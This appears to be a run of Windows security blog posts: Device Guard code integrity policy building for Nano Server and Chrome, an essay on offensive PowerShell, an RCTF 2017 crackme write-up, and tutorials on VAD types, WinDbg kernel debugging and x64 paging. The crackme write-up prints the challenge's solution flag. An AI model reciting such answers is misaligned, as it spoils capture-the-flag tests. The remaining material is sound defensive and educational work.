      <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146" />
      <CertPublisher Value="Microsoft Windows" />
    </Signer>
    <Signer ID="ID_SIGNER_S_1" Name="Microsoft Code Signing PCA 2010">
      <CertRoot Type="TBS" Value="121AF4B922A74247EA49DF50DE37609CC1451A1FE06B2CB7E1E079B492BD8195" />
    </Signer>
  </Signers>
  <!--Driver Signing Scenarios-->
  <SigningScenarios>
    <SigningScenario Value="131" ID="ID_SIGNINGSCENARIO_DRIVERS_1" FriendlyName="Kernel-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_1" />
          <AllowedSigner SignerId="ID_SIGNER_S_2" />
          <AllowedSigner SignerId="ID_SIGNER_F_1" />
          <AllowedSigner SignerId="ID_SIGNER_F_2" />
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
    <SigningScenario Value="12" ID="ID_SIGNINGSCENARIO_WINDOWS" FriendlyName="User-mode rules">
      <ProductSigners>
        <AllowedSigners>
          <AllowedSigner SignerId="ID_SIGNER_S_3" />
          <AllowedSigner SignerId="ID_SIGNER_S_4" />
          <AllowedSigner SignerId="ID_SIGNER_S_5" />
          <AllowedSigner SignerId="ID_SIGNER_S_6" />
        </AllowedSigners>
      </ProductSigners>
    </SigningScenario>
  </SigningScenarios>
  <UpdatePolicySigners />
  <CiSigners>
    <CiSigner SignerId="ID_SIGNER_S_3" />
    <CiSigner SignerId="ID_SIGNER_S_4" />
    <CiSigner SignerId="ID_SIGNER_S_5" />
    <CiSigner SignerId="ID_SIGNER_S_6" />
  </CiSigners>
  <HvciOptions>0</HvciOptions>
</SiPolicy>


I conducted the following phases to generate this policy:
  1. Generate a default, deny-all policy by calling New-CIPolicy on an empty directory. I also increased the size of the Microsoft-Windows-CodeIntegrity/Operational event log to 20 MB to account for the large number of 3076 events I expected while deploying the policy in audit mode. I also focused solely on drivers for this phase, so I didn't initially include the "Enabled:UMCI" option. My approach moving forward will be to tackle driver rules first and user-mode rules second so as to minimize unnecessary cross-pollination between rule sets.
  2. Reboot and start pulling out blocked driver paths from the event log. I wanted to use the WHQLFilePublisher rule for the drivers but apparently, none of them were WHQL signed despite some of them certainly appearing to be WHQL signed. I didn't spend too much time diagnosing this issue since I have never been able to successfully get the WHQLFilePublisher rule to work. Instead, I resorted to the FilePublisher rule.
  3. After I felt confident that I had a good driver whitelist, I placed the policy into enforcement mode and rebooted. What resulted was nonstop boot failures. It turns out that if you're whitelisting individual drivers, critical drivers like ntoskrnl.exe and hal.dll won't show up in the event log in audit mode. So I explicitly added rules for them, and Nano Server still wouldn't boot. What made things worse is that even when I placed the policy back into audit mode, there were no new blocked driver entries, yet the system still refused to boot. I rolled the dice and posited that there might be an issue with certificate chain validation at boot time, so I created a PCACertificate rule for ntoskrnl.exe (the "Microsoft Code Signing PCA 2010" rule). This miraculously did the trick, at the expense of creating a more permissive policy. In the end, I wound up with roughly the equivalent of a Publisher ruleset for my drivers, with the exception of my Intel NIC driver.
  4. I explicitly made a FilePublisher rule for my Intel NIC driver, as it was the only 3rd party, non-OEM driver I had to add when creating my Nano Server image. I don't need to allow any other code signed by Intel, so I explicitly allow only that one driver.
  5. After I got Nano Server to boot, I started working on user-mode rules. This process was relatively straightforward and I used the Publisher rule for user-mode code.
  6. After using Nano Server in audit mode with my new rule set and not seeing any legitimate binaries that would have been blocked, I felt confident in the policy and placed it into enforcement mode. I haven't run into any issues since, and I'm now using Nano Server as a Hyper-V server (i.e. with the "Compute" package).
I still need to get around to adding my code-signing certificate as an authorized policy signer, sign the policy, and remove "Enabled:Unsigned System Integrity Policy". Overall though, despite the driver issues, I'm fairly content with how well locked down my policy is. It essentially only allows a subset of critical Microsoft code to execute with the exception of the Intel driver which has a very specific file/signature-based rule.

Conclusion

I'm not sure if we'll see improved code integrity or Device Guard support for Nano Server in the future, but something is at least better than nothing. As it stands though, if you are worried about the execution of untrusted PowerShell code, unfortunately, UMCI does nothing to protect you on Nano Server. Code integrity still does a great job of blocking untrusted compiled binaries though - a hallmark of the vast majority of malware campaigns. Nano Server opens up a whole new world of possibilities from a management and malware perspective. I'm personally very interested to see how attackers will try to evolve and support their operations in a Nano Server environment. Fortunately, the combination of Windows Defender and code integrity support offer a solid security baseline.

Updating Device Guard Code Integrity Policies

30 December 2016 at 23:01
In previous posts about Device Guard, I spent a lot of time talking about initial code integrity (CI) configurations and bypasses. What I haven't covered until now, however, is an extremely important topic: how does one effectively install software and update CI policies accordingly? In this post, I will walk you through how I got Chrome installed on my Surface Book running with an enforced Device Guard code integrity policy.

The first questions I posed to myself were:
  1. Should I place my system into audit mode, install the software, and base an updated policy on CodeIntegrity event log entries?
  2. Or should I install the software on a separate, non Device Guard protected system, analyze the file footprint, develop a policy based on the installed files, deploy, and test?
My preference is option #2, as I would prefer not to place a system back into audit mode if I can avoid it. That said, audit mode would yield the most accurate results, as it would tell you exactly which binaries would have been blocked - precisely the ones you would want to base whitelist rules on. In this case, there's no right or wrong answer. My decision to go with option #2 was to base my rules solely off binaries that execute post-installation, not during installation. My mantra with whitelisting is to be as restrictive as is reasonable.

So how did I go about beginning to enumerate the file footprint of Chrome?
  1. I opened Chrome, ran it as I usually would, and used PowerShell to enumerate loaded modules.
  2. I also happened to know that the Google updater runs as a scheduled task so I wanted to obtain the binaries executed via scheduled tasks as well.
I executed the following to get a rough sense of where Chrome files were installed:

(Get-Process -Name *Chrome*).Modules.FileName | Sort-Object -Unique
(Get-ScheduledTask -TaskName *Google*).Actions.Execute | Sort-Object -Unique


To my surprise and satisfaction, Google manages to house nearly all of its binaries in C:\Program Files (x86)\Google. This allows for a great starting point for building Chrome whitelist rules.

Next, I had to ask myself the following:
  1. Am I okay with whitelisting anything signed by Google?
  2. Do I only want to whitelist Chrome? i.e. All Chrome-related EXEs and all DLLs they rely upon.
  3. I will probably want Chrome to be able to update itself without Device Guard getting in the way, right?
While I like the idea of whitelisting just Chrome, there are some potential pitfalls. By whitelisting just Chrome, I would need to be aware of every EXE and DLL that Chrome requires to function. I could certainly do that, but it would be a relatively work-intensive effort. With that list, I would then create whitelist rules using the FilePublisher file rule level. This would be great initially, and it would potentially be the most restrictive strategy while still allowing Chrome to update itself. The issue is: what happens when Google decides to include one or more additional DLLs in the software installation? Device Guard will block them, and I will be forced to update my policy yet again. I'm all about applying a paranoid mindset to my policy, but at the end of the day, I need to get work done other than constantly updating CI policies.

So the whitelist strategy I choose in this instance is to allow code signed by Google and to allow Chrome to update itself. This strategy equates to using the "Publisher" file rule level - "a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA (such as Symantec), but only if the leaf certificate is from a specific company (such as Intel, for device drivers)."

I like the "Publisher" file rule level because it offers the most flexibility, longevity for a specific vendor's code signing certificate. If you look at the certificate chain for chrome.exe, you will see that the issuing PCA (i.e. the issuer above the leaf certificate) is Symantec. Obviously, we wouldn't want to whitelist all code signed by certs issued by Symantec but I'm okay allowing code signed by Google who received their certificate from Symantec.

Certificate chain for chrome.exe
So now I'm ready to create the first draft of my code integrity rules for Chrome.

I always start by creating a FilePublisher rule set for the binaries I want to whitelist because it allows me to associate what binaries are tied to their respective certificates.

$GooglePEs = Get-SystemDriver -ScanPath 'C:\Program Files (x86)\Google' -UserPEs
New-CIPolicy -FilePath Google_FilePub.xml -DriverFiles $GooglePEs -Level FilePublisher -UserPEs


What resulted was the following ruleset. Everything looked fine except for a single Microsoft rule that was generated, associated with d3dcompiler_47.dll. I looked in my master rule policy and I already had this rule. Being obsessive compulsive, I wanted a pristine ruleset including only Google rules. This is good practice anyway once you get in the habit of managing large whitelist rulesets: you'll want to keep separate policy XMLs for each whitelisting scenario you run into and then merge accordingly. After removing the MS binary from the list, what resulted was a much cleaner ruleset (Publisher level applied this time) consisting of only two signer rules.

$OnlyGooglePEs = $GooglePEs | ? { -not $_.FriendlyName.EndsWith('d3dcompiler_47.dll') }
New-CIPolicy -FilePath Google_Publisher.xml -DriverFiles $OnlyGooglePEs -Level Publisher -UserPEs


So now, all I should need to do is merge the new rules into my master ruleset, redeploy, reboot, and if all works well, Chrome should install and execute without issue.

$MasterRuleXml = 'FinalPolicy.xml'
$ChromeRules = New-CIPolicyRule -DriverFiles $OnlyGooglePEs -Level Publisher
Merge-CIPolicy -OutputFilePath FinalPolicy_Merged.xml -PolicyPaths $MasterRuleXml -Rules $ChromeRules
ConvertFrom-CIPolicy -XmlFilePath .\FinalPolicy_Merged.xml -BinaryFilePath SIPolicy.p7b

# Finally, on the Device Guard system, replace the existing
# SIPolicy.p7b with the one that was just generated and reboot.


One thing I neglected to account for was the initial Chrome installer binary. I could have incorporated the binary into this process, but I wanted to try my luck that Google used the same certificate to sign the installer. To my luck, they did, and everything installed and executed perfectly. I consider myself lucky in this case because I selected a software publisher (Google) that employs decent code signing practices.
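
Had I wanted certainty rather than luck, a quick signature inspection of the installer would have confirmed whether the same publisher rule applies. A minimal check (the installer path is hypothetical):

# Inspect the Authenticode signer of the installer before running it
$Signature = Get-AuthenticodeSignature -FilePath '.\ChromeSetup.exe'
$Signature.SignerCertificate.Subject
$Signature.SignerCertificate.Issuer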

Conclusion

In future blog posts, I will document my experiences deploying software that doesn't adhere to proper signing practices or doesn't even sign their code. Hopefully, the Google Chrome case study will, at a minimum, ease you into the process of updating code integrity policies for new software deployments.

The bottom line is that this isn't an easy process. Are there ways in which Microsoft could improve the code integrity policy generation/update/deployment/auditing experience? Absolutely! Even if they did though, the responsibility ultimately lies on you to make informed decisions about what software you trust and how you choose to enforce that trust!

PowerShell is Not Special - An Offensive PowerShell Retrospective

5 January 2017 at 23:35
“PowerShell is not special.”

During Jared Haight's excellent DerbyCon presentation, he uttered this blasphemous sentence. As someone who has invested the last five years of his life learning and mastering PowerShell, at a surface level it was easy to dismiss such a claim. However, I've done a lot of introspection about my investment in offensive PowerShell, and the more I thought about it, the more I began to realize that PowerShell really isn't that special! Before you bring out the torches and pitchforks, allow me to apply context.

My first exposure to PowerShell was from Dave Kennedy and Josh Kelley during their DEF CON presentation - PowerShell OMFG. Initially, I considered PowerShell to be amusing from a security perspective. I was just getting my start in infosec, however, and I had a lot of other things that I needed to focus on. Not long after that talk, Chris Campbell (@obscuresec) took a keen interest in PowerShell and heavily advocated that we start using it on our team. My obsession with PowerShell wasn't solidified until I realized that it could be used as a shellcode runner. Once I saw that there really wasn't anything PowerShell couldn't do, my interest in and promotion of offensive PowerShell began in earnest.

For years, I did my part in developing unique offensive capabilities in PowerShell, to the approval of many in the community and to the disappointment of defenders and employees of Microsoft. At the time, their disappointment and frustration were justified to an extent. When I started writing offensive PowerShell code, v3 hadn't been released, so the level of detection was laughable. Fast forward to now - PowerShell v5 (which is available downlevel to Windows 7). I challenge anyone to identify a single language - scripting, interpreted, compiled, or otherwise - that has better logging than PowerShell v5. Additionally, if defenders choose to employ whitelisting to enforce trusted PowerShell code, both AppLocker and Device Guard do what many still (mistakenly) believe the execution policy was intended to do - actually perform signature enforcement of PowerShell code.

While PowerShell has become extremely popular amongst pentesters, red-teamers, criminals, and state-sponsored actors, let's not forget that we're still getting compromised by compiled payloads every... freaking... day. PowerShell really is just a means to an end in achieving an attacker's objective - now at the cost of generating significant noise with the logging offered by PowerShell v5. PowerShell obviously offers many distinct advantages for attackers that I highlighted years ago, but defenders and security vendors are slowly but surely catching up with detecting PowerShell attacks. Additionally, with the introduction of AMSI, for all of its flaws, we now have AV engines that can scan arbitrary buffers in memory.

So in the context of offense, this is why I say that PowerShell really isn’t special. Defenders truly are armed with the tools they need to detect and mitigate against PowerShell attacks. So the next time you find yourself worrying about PowerShell attacks, make sure you’re worrying equally, if not more about every other kind of payload that could execute on your system. Don’t be naïve, however, and write PowerShell off as a “solved problem.” There will always continue to be innovative bypass/evasion research in the PowerShell space. Let’s continue to bring this to the public’s attention and the community will continue to benefit from the fruits of offensive and defensive research.


RCTF 2017 - Crackme 714 pts Writeup


Crackme 714 pts (9 solves):


Please submit the flag like RCTF{flag}
Binary download: here

The crackme is an MFC application :

 

We can locate the routine of interest by setting a breakpoint on GetWindowTextW. Keep in mind that the input is in Unicode.
Later on, we find that the program generates two distinct blocks of values. These are generated from hard-coded values independently of the user input, so they're always the same. We'll call the first one static_block1 and the second static_block2.
Then, there's the call to the encrypt function which takes static_block1 as an argument.
 
The encrypted block will then be XORed with static_block2.
We also find a reference to the encrypted valid key here, which we can easily extract at runtime:

 
The loop above performs a double-word by double-word comparison of the encrypted user input with the encrypted valid key that already came with the crackme.

In order to solve the challenge, we need to reverse engineer the encrypt function and implement its exact inverse. We also must not forget the XOR with static_block2. For that matter, we supply encrypted_valid_key XOR static_block2 to the decrypt function (the one we need to write).

The script below contains my implementation of the decrypt function; it outputs the key to flag.txt:

All we need to do now, is provide the decrypted key and the flag will be displayed.

The flag is : RCTF{rtf2017crackmebyw31y1l1n9}

See you again soon.
Follow me on Twitter: here

Exploring Virtual Address Descriptors under Windows 10

This blog post is about my personal attempt to superficially list VAD types under Windows 10. It all started when I was wondering, out of sheer curiosity, if there's any way to determine the VAD type (MMVAD_SHORT or MMVAD) other than by looking at the pool tag preceding the structure. In order to do that, I had to list all VAD types, do some reverse engineering, and then draw a table describing what I've been able to find.
You can view the full document by clicking here 



From the table in that document, it is possible to deduce the VAD structure type from the combination of the VadType and PrivateMemory flags, summarized below:

VadType flag    PrivateMemory flag    Type
0               0                     MMVAD
0               1                     MMVAD_SHORT
1               1                     MMVAD
2               0                     MMVAD
3               1                     MMVAD_ENCLAVE

To test it out, I wrote a kernel driver that prints the deduced VAD type for each node of calc.exe's VAD tree. It also prints the pool tag so we can verify the result.


And that's all for this article.
You can follow me on Twitter: here

Setting up kernel debugging using WinDbg and VMware

By: Nemi
8 July 2017 at 02:29
Setting up WinDbg for kernel-mode debugging is a fairly trivial process; however, it's easy to miss (or incorrectly configure) a step, causing you to waste precious time.

In this post, I have written a tutorial that goes through the entire process of setting up WinDbg (and configuring symbol lookup) for kernel-mode debugging with VMware using a named pipe and a virtual serial connection.

Serial port debugging was chosen for compatibility reasons. Other debugging modes, like ethernet/network, while quicker, require special hardware (only certain network interface cards are compatible; many are not) and are only supported on newer versions of Windows.

Requirements

  • A copy of either VMware Workstation (free 30-day trial) or VMware Player (entirely free for non-commercial use) for Windows. I'll be using VMware Workstation 12.5.7 (build-5813279).
  • A Windows operating system installed on your host and guest (VM). These do not have to be the same versions of Windows, but should be running at least Windows XP or later. My host and guest OS are both running Windows x64 10.0.15063 (Version 1703).
    • A free copy of Windows 10 can be found here as long as the tool is run on a machine that has a valid Windows license (of any version). Follow the steps to create an ISO file. Use the ISO file to install the OS on the Virtual Machine (helpful documentation can be found on the VMware website and WikiHow).
  • WinDbg.
    • The latest and greatest version can be downloaded from this page (direct link). This requires installation through the Windows SDK, however, you can unselect all components except "Debugging Tools for Windows" if you do not plan on doing any software development. I'll be using WinDbg x64 10.0.15063.400.

Setting up symbols on your host

Microsoft provides stripped ("redacted") PDBs (commonly referred to as "symbols") for most of their software releases. This includes the kernel components that power the operating system. In order to leverage this very useful information, we'll need to set up WinDbg so it can access these resources.
  1. Locate your WinDbg installation.
  • For most people, this will be located in the following directory:
    C:\Program Files (x86)\Windows Kits\10\Debuggers\x64
  • Right-click on the windbg.exe file and select "Create shortcut". This shortcut should be placed on the desktop or another convenient place.
  • Right-click on the shortcut that you just created. Select "Properties". In the "Shortcut" tab, you'll see a window similar to this:
  • Select the "Target:" text field and append a string of the following format:
    -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols"
    • The syntax of this command string is:
      srv*[local cache]*[private symbol server]*https://msdl.microsoft.com/download/symbols
    • This will download all available symbols, as necessary, from the Microsoft Symbol Server to your local symbol directory at c:\symbols. If you prefer to place your downloaded symbols somewhere else, choose another local path instead.
    • This command supports multiple symbol servers. For example, if you wish to pull symbols from a remote share, you can append to this path, e.g:
      srv*c:\symbols*\\mainserver\symbols*https://msdl.microsoft.com/download/symbols
    • Example of a fully qualified "Target:" text field:
      "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols"
  • Save your shortcut changes by pushing 'OK'. Now that we've instructed WinDbg to pull symbol information from the Microsoft Symbol Server, let's test it to ensure that everything is working.
    • We pass the symbol path via a command line parameter to WinDbg for reliability reasons. We could have, alternatively, configured an environment variable, _NT_SYMBOL_PATH, to achieve the same functionality, but it's a less elegant solution.
  • Run the shortcut and a copy of the pre-installed application Notepad.
  • Select "File" then "Attach to a Process..." (or hit F6) in WinDbg. Scroll down all the way and select "notepad.exe" from your process list. Then hit 'OK'.
  • A "Command" window will appear. We'll use this to issue commands to WinDbg.
    • I like to expand my "Command" window so it takes up the full view in the debugger. You can do this by right clicking on the "Command" window title and selecting "Dock":
  • Let's try to load symbols for all the running modules (executable and DLLs). First, let's list what modules are currently loaded in our process by using the lm (list modules) command in the text box immediately to the right of ">". This is in the bottom left corner of the "Command" window:
    If your list looks different from mine, don't worry. Different versions of Windows and different versions of Notepad will have different modules loaded.
  • Next, let's force a symbol load of all modules within our process by executing .reload /f:
    • Pro-tip: WinDbg has a great manual. To access it, you can type the command .hh within the debugger (or select "Help" and then "Search" from the menu bar). Typing .hh search terms go here automatically runs a search for the user supplied argument.
    • .hh .reload documents the .reload command. In particular, it explains why the /f argument is supplied.
  • It may take WinDbg a few moments to load all symbol information. You can see the status of WinDbg in the bottom left corner (next to where commands are inserted). After WinDbg has loaded symbols, run the lm command again.
    • Pro-tip: If WinDbg stays "BUSY" for a long time, you can force it to stop its current task by pushing Ctrl+Break on your keyboard or by selecting "Debug" and then "Break" from the menu bar.
      As you can see, most modules now have a local symbol path listed to the right of their module name. It's very possible that there may be some modules that still do not have symbols loaded. These modules are most likely not distributed by Microsoft (e.g. 3rd party antivirus vendors).
  • For validation, go to the directory that you've setup for your local symbol cache, e.g. C:\symbols. If the folder contains data, you're set and can skip the troubleshooting step.
  • Troubleshooting

    Verbose output

    The easiest way to troubleshoot problems with symbol loading is to enable verbose output with the !sym noisy command:

    Next, issue the .reload /f command.

    In my example, it's easy to see that I mistyped the URL to the Microsoft Symbol Server in my shortcut's "Target:" field. After applying the right URL to my "Target:" field, I can restart WinDbg and try again. 

    The lazy fix

    WinDbg may be able to fix the problem for you automagically if you issue .symfix and then .reload /f. In this case, WinDbg will alter your symbol path to the Microsoft Symbol Server. Your downloaded symbols will be stored, locally, in WinDbg's current working directory (C:\Program Files (x86)\Windows Kits\10\Debuggers\x64) or C:\ProgramData\dbg.

    Setting up VMware on your host

    1. Select the VM you wish to enable kernel-mode debugging on within VMware.
      • VMs should be listed in the "Library" pane on the left of the GUI. If the "Library" pane is missing, you can restore it by selecting "View" then "Customize" and choosing "Library" (or hit F9).
      • If your VM is not listed in the "Library" pane, you can manually navigate to its .vmx file via "File" and then "Open..." (or Control+O).
    2. Ensure that the VM is currently not running. If it's currently active, power it off via the menu bar: "VM" then "Power" then "Shut Down Guest" (or Ctrl+E).
    3. Select "Edit virtual machine settings". Ensure that you are on the "Hardware" tab.
    4. Select the "Add" button and choose "Serial Port" from the "Add Hardware Wizard". Hit "Next >".
    5. Ensure that the "Serial port" checkbox is targeting "Output to named pipe" and then hit "Next >".
    6. On the final screen, you should see similar settings to this. Make a note of the "Named pipe" field and then hit "Finish".
      • Ensure that your settings match those above. In particular, output to a "Named pipe" at \\.\pipe\com_1 and ensure that the first drop down box has "This end is the server" selected and the last drop down box has "The other end is a virtual machine" selected. Finally, make sure that you've selected "Connect at power on".
      • The com_1 substring can be changed to something else (e.g. kdebug), but it needs to be remembered and the exact name should be used within WinDbg too.
    7. The "Add Hardware Wizard" will now close and a new "Serial port" will be added to your "Hardware" tab. Ensure the "Yield CPU on poll" checkbox is selected in "Virtual Machine Settings". Make a note of the number to the right of "Serial Port" (if there is no number, it's assumed to be 1).
      In my example, my serial port is number 2.
      • The 'Printer' is using "Serial Port 1".

    In the guest (Virtual Machine) context

    For guests (VMs) running Windows Vista and later.

    1. Start the VM.
    2. After Windows is finished loading, run "Command Prompt" (Start+R > cmd.exe) as an Administrator.
      • In Windows 10, you can right-click on the Windows logo in the taskbar (bottom-left) and select "Command Prompt (Admin)".
    3. Input the following commands in this elevated prompt:
    • bcdedit /debug on
    • bcdedit /dbgsettings serial debugport:2 baudrate:115200
      • Make sure your debugport argument matches your serial port number from step 7 in the "Setting up VMware" section. My serial port number is 2 because my VM has a printer that is using serial port number 1.
      • Pro-tip: You can add the /noumex switch to the dbgsettings command, e.g. bcdedit /dbgsettings serial debugport:2 baudrate:115200 /noumex. This prevents user-mode exceptions from causing the system to break into the kernel debugger.
  • Now validate that the settings have been successfully applied:
    • bcdedit /dbgsettings
    • bcdedit
    You should see similar command prompt output to this:
  • Finally, shutdown Windows cleanly. You can do this via the traditional route (the start menu) or by executing the shutdown -s -t 0 command in command prompt.
  • For guests (VMs) running Windows XP.

    1. Start the VM.
    2. bcdedit does not exist on Windows XP. To enable kernel debugging, you must alter the boot.ini file. The easiest way to do this is by clicking on Start and then Run (Start+R). Enter C:\boot.ini as the argument and hit 'OK'.
      • You might have to change the drive letter (from C:\) if your operating system is installed on a different drive.
      • This file is hidden (and considered a protected operating system file). Therefore, it won't be displayed in Windows Explorer by default.
    3. Append the string /debug /debugport=COM2 /baudrate=115200 to the end of the first entry in the [operating systems] section.
      • Make sure your debugport argument matches your serial port number from step 7 in the "Setting up VMware" section. My serial port number is 2 (hence COM2) because my VM has a printer that is using serial port number 1.
    4. Save the boot.ini via "File" and then "Save" from the menu bar (or hit Control+S). Close the file.
    5. Finally, shutdown Windows cleanly via the traditional route (the start menu).

    Finalizing WinDbg on your host

    1. Open the shortcut to your WinDbg that you created in step 2 in the "Setting up symbols on your host" section.
    2. Click on "File" and then "Kernel Debug..." (or press Ctrl+K). Select the "COM" tab and use your settings from the previous sections. If you've been following the tutorial verbatim, you can just use these settings:
    3. Finally, hit 'OK' and launch your Virtual Machine. WinDbg should automatically establish a connection to VMware when Windows begins loading.
    4. Break into the debugger by pressing Ctrl+Break or by selecting "Debug" and then "Break" from the menu bar. At this point, the Virtual Machine will be in a suspended state (e.g. Windows will stop loading).
    5. Load your kernel symbols with a .reload /f command. Then list the loaded modules via lm. If you're having troubles loading symbols, review the "Setting up symbols on your host" section above and work through the "Troubleshooting" tips if all else fails.
    6. Congratulations. At this point you've successfully set up kernel debugging using WinDbg and VMware over a virtual serial connection.

    Extra special bonus stage

    Modifying the shortcut to start kernel debugging immediately

    Having to manually configure WinDbg each time for kernel debugging is a real pain. Luckily, there is a better way. 
    1. Right-click on the shortcut that you created for WinDbg. Select "Properties". In the "Shortcut" tab, you'll see a window similar to this:
    2. Append the following string to the "Target:" textbox:
      -k com:pipe,port=\\.\pipe\com_1,resets=0,reconnect
      • You might have to change the pipe name from com_1 to whatever you selected in step 6 in the "Setting up VMware on your host" section.
      • The final "Target:" argument should look similar to this:
        "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -y "srv*c:\symbols*https://msdl.microsoft.com/download/symbols" -k com:pipe,port=\\.\pipe\com_1,resets=0,reconnect
    3. Hit 'OK' and you should be all set. Now when you run this shortcut of WinDbg, it will correctly configure your symbol path (without having to use yucky environment variables) and will automatically start kernel debugging the first active named pipe.

    Introduction to IA-32e hardware paging

    8 July 2017 at 02:51
    In this article, we explore the complexities and concepts behind Intel's 64-bit paging scheme, why we need paging in the first place, and some practical analysis of paging structures.

    Why do we need paging?

    In any application, whether it's a student's first program or a complicated operating system, instructions executed by the computer that involve memory use a virtual address. In fact, even when the CPU fetches the next instruction to execute, it uses a virtual address. A virtual address represents a specific location in the application's view of memory; however, it does not represent a location within physical RAM. Paging, or linear address translation, is the mechanism that converts a linear address accessible by the CPU to a physical address that the memory management unit (MMU) can use to access physical memory.

    Technically, a linear address and a virtual address are not the same. For the purposes of this article, though, we will consider them to be the same, since we do not need to consider segmentation. Older architectures would first need to convert a virtual address to a linear address using segmentation.



    Figure 1: An application with different parts of virtual memory mapping to different parts of physical memory.

    Paging modes

    In this article, we will focus on IA-32e 4-level paging (64-bit paging) on Intel architectures. It is worth noting, though, that there are other paging modes supported by Intel.

    There are three mechanisms which control paging and the currently enabled paging mode. The first is the PG flag (bit 31) in control register 0 (CR0). If this bit is set, paging is enabled on the processor. If this bit is not set, no paging is enabled. In the latter case, the virtual address and physical address are considered equivalent and no translation is necessary.

    If paging is enabled on the processor, then control register 4 (CR4) is checked for the Physical Address Extension (PAE) bit (bit 5) being set. If it is not, then 32-bit paging is used. If it is set, then the final condition that is checked is the Extended Feature Enable Register, or IA32_EFER MSR. If the Long Mode Enable (LME) bit (bit 8) of this register is not set, the processor is in PAE 36-bit paging mode. If the LME bit is set, the processor is in 4-level paging mode, which is the 64-bit mode that we plan to explore in this article. This mode translates 48-bit virtual addresses into 52-bit physical addresses, though because the virtual addresses are limited to 48 bits, the maximum addressable space is limited to 256TB.

    Paging structures

    Regardless of which paging mode is enabled, a series of paging structures are used to facilitate the translation from a virtual address to a physical address. The format and depth of these paging structures will depend on the paging mode chosen. Generally speaking, each entry in the paging structure is the size of a pointer and contains a series of control bits, as well as a page frame number.

    In our case, 64-bit mode structures are 4,096 bytes in size (the size of the smallest architecture page - we will touch more on that later), containing 512 entries each. Every entry is 8 bytes.



    Figure 2: A paging structure containing 512 pointer-size entries in 64-bit mode.

    The first paging structure is always located at the physical address specified in control register 3 (CR3). As an aside, this is also the only place that stores the fully qualified physical address of a paging structure - in all other cases, we need to multiply a page frame number by the size of a page to get the real physical address. Each entry within the paging structure will contain a page frame number which either references a child paging structure for that region of memory, or maps directly to a page of physical memory that the original virtual address translates to. Again, in both cases, the page frame number is simply an index of a physical page in memory, and needs to be multiplied by the size of a page to get a meaningful physical address. Each paging structure entry also describes the different memory access protections that are applied to the memory region it describes - whether the memory is writable, executable, etc. - as well as some more interesting properties, such as whether or not that specific structure has previously been used for a translation.

    While the nested paging structures are being walked, the translation can be considered complete either by identifying a page frame at the lowest level of paging structure or by an early termination caused by the configuration of a paging structure. For example, if a paging structure is marked as not present (bit 0 of the structure is not set) or if a reserved bit is set, the translation fails and the virtual address is considered invalid. Additionally, a paging structure can set its Page Size bit to indicate that it is the lowest paging structure for that region of memory, which we will touch more on later.



    Figure 3: Some paging structures may not map to a physical page because the virtual address range they represent is invalid.

    Anatomy of a virtual address

    Information is encoded in a virtual address that makes the translation to a physical address possible. In 64-bit mode, we use 4-level paging, which means that any given virtual address can be divided into 6 sections with 4 of them associated with the different paging structures.

    The different paging structures are as follows: a PML4 table (located in CR3), a Page Directory Pointer Table (PDPT), a Page Directory (PD), and a Page Table (PT). The figure below illustrates which bits of a given virtual address map to these different paging structures.

    A single entry in the PML4 table (a PML4E) can address up to 512GB of memory, while an entry in the PDPT (a PDPTE) can address 1GB (parent granularity divided by 512) of memory, and so on. This is how we get the granularity of the paging structures down to 4KB at the lowest level.



    Figure 4: The anatomy of a virtual address in 64-bit mode.

    In the example above, we see that the highest bits (bits 63-48) are reserved. We will talk more about these bits in a future article, but for the purposes of address translation they are not used.

    The next 9 bits (bits 47-39) are used to identify the index into the PML4 table that contains the entry (PML4E) that's next in our paging structure walk. For example, if these 9 bits evaluate to the number 16, then the entry at index 16 (PML4[16], the seventeenth entry in the table) is selected to be used for the address translation.

    Once we have the PML4E entry from the given index, we can use that entry to provide us the address of the start of the next paging structure to walk to. Here is an example of what a PML4E structure would look like in C++.
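    A minimal sketch of such a structure, following the Intel SDM bit layout (ULONG64 is the usual 8-byte unsigned Windows type; the field names are illustrative rather than taken from any official header):

    union PML4E
    {
        struct
        {
            ULONG64 Present : 1;          // must be 1 for the entry to be valid
            ULONG64 ReadWrite : 1;        // 0 = read-only, 1 = writable
            ULONG64 UserSupervisor : 1;   // 1 = accessible from user mode
            ULONG64 PageWriteThrough : 1;
            ULONG64 PageCacheDisable : 1;
            ULONG64 Accessed : 1;         // set when used for a translation
            ULONG64 Ignored1 : 1;
            ULONG64 PageSize : 1;         // reserved (must be 0) in a PML4E
            ULONG64 Ignored2 : 4;
            ULONG64 PageFrameNumber : 36; // bits 47-12: PFN of the next structure
            ULONG64 Reserved : 4;
            ULONG64 Ignored3 : 11;
            ULONG64 ExecuteDisable : 1;   // if set, instruction fetches are disallowed
        };
        ULONG64 Value;
    };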


    Using the page frame number (PFN) member of the structure (in this case, it actually refers to the page frame where the next structure is located), we can now walk to the next structure in the hierarchy by multiplying that number by the size of a page (0x1000). The result of that multiplication is the physical address where the next paging structure is located. The PML4E points to a Page Directory Pointer Table (PDPT). We use the next 9 bits of our original virtual address (bits 38-30) to determine the index in the PDPT that we want to look at. At that index, we will find a PDPTE structure, like the one defined below.
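    A matching sketch for the PDPTE, under the same assumptions; the layout is the same, but the PageSize bit now has meaning:

    union PDPTE
    {
        struct
        {
            ULONG64 Present : 1;
            ULONG64 ReadWrite : 1;
            ULONG64 UserSupervisor : 1;
            ULONG64 PageWriteThrough : 1;
            ULONG64 PageCacheDisable : 1;
            ULONG64 Accessed : 1;
            ULONG64 Ignored1 : 1;
            ULONG64 PageSize : 1;         // if set, this entry maps a 1GB page directly
            ULONG64 Ignored2 : 4;
            ULONG64 PageFrameNumber : 36; // PFN of the Page Directory (when PageSize = 0)
            ULONG64 Reserved : 4;
            ULONG64 Ignored3 : 11;
            ULONG64 ExecuteDisable : 1;
        };
        ULONG64 Value;
    };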


